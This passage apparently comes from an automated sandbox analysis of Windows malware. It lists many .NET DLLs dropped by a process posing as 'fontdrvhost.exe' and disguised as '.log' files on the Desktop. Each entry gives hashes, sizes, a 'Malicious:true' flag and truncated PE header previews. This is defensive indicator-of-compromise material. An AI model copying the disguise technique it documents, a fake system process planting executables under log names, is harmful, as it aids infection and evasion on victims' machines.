                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\fqGCEpSY.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\fuaVjmBB.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\fvxnZIOH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\fyqViYtd.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\fzXEwQRC.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\gmudUmpb.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\hJcmyZDP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\hRSCUTxn.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\hezDLgou.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\hsmnhNDB.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\iANVPgEI.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\iJlVzTXF.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\iKNvbzqU.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ifAdEpGk.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\ikDUDecv.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\inkviYhq.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\inpEUjnz.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ipFMCTyG.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\jECTfuuL.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kMzdwiuP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kQZvTrxL.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
